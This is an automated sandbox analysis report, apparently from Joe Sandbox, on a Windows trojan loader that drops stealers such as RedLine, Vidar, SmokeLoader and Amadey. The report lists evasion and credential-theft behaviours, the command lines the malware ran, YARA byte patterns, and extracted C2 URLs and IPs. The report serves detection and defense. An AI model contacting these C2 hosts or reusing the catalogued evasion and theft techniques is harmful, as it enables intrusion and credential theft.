Edit tour

Windows Analysis Report
i1crvbOZAP.exe

Overview

General Information

Sample name:	i1crvbOZAP.exe renamed because original name is a hash value
Original sample name:	4204b9d4c4df5c4b4d67922db24f342a.exe
Analysis ID:	1416900
MD5:	4204b9d4c4df5c4b4d67922db24f342a
SHA1:	9255b5e94028f3f55adda2576d60bd39452eaf08
SHA256:	62cd7b447bdee3ec1670c92d9585e1fddbaa5d4ee824dee8f15940005bf95414
Tags:	64exePrivateLoadertrojan
Infos:

Detection

Amadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Disable power options

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Amadeys stealer DLL

Yara detected AntiVM3

Yara detected Glupteba

Yara detected Mars stealer

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected RisePro Stealer

Yara detected SmokeLoader

Yara detected Stealc

Yara detected Vidar

Yara detected Vidar stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains very large array initializations

.NET source code references suspicious native API functions

Adds extensions / path to Windows Defender exclusion list (Registry)

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Connects to many ports of the same IP (likely port scanning)

Contains functionality to inject code into remote processes

Creates HTML files with .exe extension (expired dropper behavior)

Creates a thread in another existing process (thread injection)

Disable Windows Defender real time protection (registry)

Disables Windows Defender (deletes autostart)

Drops PE files to the document folder of the user

Exclude list of file types from scheduled, custom, and real-time scanning

Found Tor onion address

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides threads from debuggers

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies Group Policy settings

Modifies power options to not sleep / hibernate

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

Performs DNS queries to domains with low reputation

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses process hollowing technique

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses powercfg.exe to modify the power settings

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Windows Defender Exclusions Added - Registry

Tries to load missing DLLs

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

i1crvbOZAP.exe (PID: 6984 cmdline: "C:\Users\user\Desktop\i1crvbOZAP.exe" MD5: 4204B9D4C4DF5C4B4D67922DB24F342A)

uRWnWA7bjEhugCQgmREIdGsh.exe (PID: 7608 cmdline: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe MD5: B474DC1155AF2463F2F9F603E39264FB)

cTThtD77H613MBNsXAevJo07.exe (PID: 7616 cmdline: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe MD5: 89EC2C6BF09ED9A38BD11ACB2A41CD1B)

conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 8156 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

tskTMObYcvz1CtypLgyOWpYi.exe (PID: 7624 cmdline: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe MD5: B6BBB03B84E589433F139D88CA24C62D)

conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7076 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

fq9BbqPKEgDrDHrc1Aru5zuA.exe (PID: 7632 cmdline: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe MD5: 1163DFDB973A2054DC853BA3723E0363)

conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 6284 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 4416 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7632 -s 980 MD5: C31336C1EFC2CCB44B4326EA793040F2)

g1nHVnlr2tXTEWQsRz_M547D.exe (PID: 7640 cmdline: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe MD5: A8F21FFC9630C023FD163AF0DA7EAD26)

KUc3lCE6xAEEreIlM0ct4583.exe (PID: 7648 cmdline: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe MD5: 19625E4EEA21C969143C6C5E964D16B1)

Y8KGRj_sUjw5KjZpIoRDoSwV.exe (PID: 7656 cmdline: C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe MD5: 934A4D455165C851267269B2823667FB)

Y8KGRj_sUjw5KjZpIoRDoSwV.tmp (PID: 7432 cmdline: "C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp" /SL5="$50440,1578341,54272,C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe" MD5: 1468F751DD82E8A2B603DE47E40EA363)

D5ft_dAZwUuL52qmUM1rPffT.exe (PID: 7664 cmdline: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe MD5: 3E827E8493283924563C9CD4D0DFCD0A)

RMz4w55AcOQKH9K459dvrUGA.exe (PID: 7672 cmdline: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe MD5: 0CF89B056C66BEF40DEDB8AFC4F57EB6)

CQTbcHuZCBIaghzHIvMnZgpt.exe (PID: 7680 cmdline: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe MD5: B091C4848287BE6601D720997394D453)

powercfg.exe (PID: 7540 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 7280 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 7288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 7304 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 4048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 7276 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 6904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 6288 cmdline: C:\Windows\system32\sc.exe delete "OBGPQMHF" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

I4B42zAlYY8EYRVPVQPCuOQX.exe (PID: 7688 cmdline: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe MD5: A7615F3FAF64E8C2DC8412FC30D5AE17)

tiToqF4gUiKaoPfx2yS40yxZ.exe (PID: 7696 cmdline: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe MD5: 46C4BF1B012F8B2E5B8F45F4F6FD97F5)

6JHxagCVExT6_J_NgFfNr8iE.exe (PID: 7704 cmdline: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe MD5: 53B44E832F052CF336E7D356905F0AB2)

DcuyIDqrnrOUlJGUzTDFRaZm.exe (PID: 7712 cmdline: C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe MD5: 917E3841636183444EC8970D46F1A89A)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

xDVBd5GtHhrlSm0slOnr7_gW.exe (PID: 7720 cmdline: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe MD5: 66373AA110A885E380BBA4FFABC8157F)

csscx6pq5pjO0BwzvKMjhfKE.exe (PID: 7728 cmdline: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe MD5: 2A9FA9F2EFF4AEA3FFBD2407751B7A51)

Install.exe (PID: 7568 cmdline: .\Install.exe MD5: 2CD533891AF666A2EC525BFE8B3E4E7A)

fSJI2dwukNtWVEjIwlXBl7N4.exe (PID: 6160 cmdline: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe MD5: 9EFA9907423CC7A421C7008BD8A0BF0D)

svchost.exe (PID: 1364 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 3992 cmdline: C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 3872 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 8080 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 3104 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 3852 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7624 -ip 7624 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 908 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7632 -ip 7632 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7560 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 7616 -ip 7616 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Glupteba	Glupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.	No Attribution	http://resources.infosecinstitute.com/tdss4-part-1/ https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/ https://blog.google/technology/safety-security/new-action-combat-cyber-crime/ https://blog.google/threat-analysis-group/disrupting-glupteba-operation/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/	https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: StealC

{"C2 url": "185.172.128.26/f993692117a3fda2.php"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://nidoe.org/tmp/index.php", "http://sodez.ru/tmp/index.php", "http://uama.com.ua/tmp/index.php", "http://talesofpirates.net/tmp/index.php"]}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199658817715"], "Botnet": "22d12fb91f01647fe2107fec81f0cc22", "Version": "8.6"}

Threatname: RedLine

{"C2 url": "5.42.65.0:29587", "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\2FN_tSqExD_WAZJi52lCzdU.zip	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Start[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x1848bd:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x184519:$s1: file:/// 0x184475:$s2: {11111-22222-10009-11112} 0x1844a9:$s3: {11111-22222-50001-00000} 0x1651c4:$s4: get_Module 0x15c3ec:$s5: Reverse 0x14b942:$s6: BlockCopy 0x16052b:$s7: ReadByte 0x18452b:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x2b0a08:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
Click to see the 5 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000002C.00000002.2173995104.0000000005890000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000C.00000002.2507946071.0000000000CCD000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x14e0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000002.2297847494.0000000003681000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000D.00000002.2170856076.00000000033B3000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
00000007.00000000.1837512672.00000000005B2000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000F.00000002.2620868713.0000000001E1E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002C.00000002.2045291964.0000000003C97000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000012.00000002.2162059804.0000000000B60000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000009.00000000.1841386447.0000000000F52000.00000002.00000001.01000000.0000000D.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0000000F.00000002.2622383626.0000000004770000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000010.00000003.1948566084.0000000004F80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000012.00000002.2163166547.0000000000B9D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x77c9:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.1695585570.0000029625C1E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
00000009.00000002.2040474083.0000000005188000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000012.00000002.2162296306.0000000000B70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000012.00000002.2162296306.0000000000B70000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000008.00000000.1838966350.0000000000742000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000002C.00000002.2038976319.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.1798566425.0000029625FFE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000012.00000002.2169331111.0000000002A31000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000012.00000002.2169331111.0000000002A31000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000001B.00000002.2895958085.0000000000E57000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000C.00000003.1853189806.0000000002680000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000C.00000003.1853189806.0000000002680000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000019.00000002.2255116493.00000000030E5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000019.00000002.2255116493.00000000030E5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000019.00000002.2195916450.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000019.00000002.2255116493.00000000032D9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
0000002C.00000002.2045291964.0000000003C38000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000C.00000002.2508285953.0000000002650000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000C.00000002.2508285953.0000000002650000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0000000C.00000002.2508285953.0000000002650000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000010.00000002.2098966112.00000000009C1000.00000040.00000001.01000000.00000010.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.1788980748.0000029625FFE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001A.00000002.2334904925.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000006.00000000.1837525388.0000000000362000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001A.00000002.2381027828.0000000000F17000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000D.00000002.2166062465.0000000002B77000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.1695276080.000002962602B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001D.00000002.2876108133.00000000011D1000.00000020.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000001D.00000002.2876108133.00000000011D1000.00000020.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000C.00000002.2507993198.0000000000CE3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000008.00000002.2290949834.0000000003A15000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000F.00000003.2393333451.0000000004877000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000000.00000003.1808069517.00000296262CB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000009.00000002.2040474083.0000000004E72000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: i1crvbOZAP.exe PID: 6984	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: cTThtD77H613MBNsXAevJo07.exe PID: 7616	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
